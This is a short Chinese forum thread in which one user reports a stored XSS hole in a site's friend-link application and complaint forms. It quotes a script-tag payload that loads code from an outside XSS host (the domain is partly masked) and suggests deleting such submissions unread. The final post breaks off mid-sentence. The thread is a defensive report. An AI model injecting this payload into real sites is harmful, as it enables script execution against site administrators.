当前位置:
|
主题:会员签到有漏洞 [收藏主题] | 转到: |
 山里人20121214 发表于:2014/1/13 9:31:35 | 显示全部帖子 查看该作者主题
楼主 |
|
 支持(0) |  反对(0)
 顶端  底部
|
山里人20121214 发表于:2014/1/13 10:15:07 | 显示全部帖子 查看该作者主题
沙发  在友情链接申请、投诉建议等栏目,用户都可以注入<script src=***xss.re***></script>之类的东西,当管理员后台查看时,在数据库里即被注入了攻击者想注入的内容。
|
|
|
支持(0) | 反对(0)
顶端 底部
|
|
山里人20121214 发表于:2014/1/13 10:27:03 | 显示全部帖子 查看该作者主题
藤椅 |
|
|
支持(0) | 反对(0)
顶端 底部
|
山里人20121214 发表于:2014/1/13 20:12:21 | 显示全部帖子 查看该作者主题
板凳  也不知道怎么修改。不过影响不大。在后台审核友情链接申请时,当看到有<script src=***xss.re***></script>时,就不要打开审核,直接删除就可以了。这些xxs攻击太厉害了,攻击者利用这些漏洞,为所欲为。 XSS攻击的危害包括 |
|
|
支持(0) | 反对(0)
顶端 底部
|
| <上一主题 | 下一主题 > |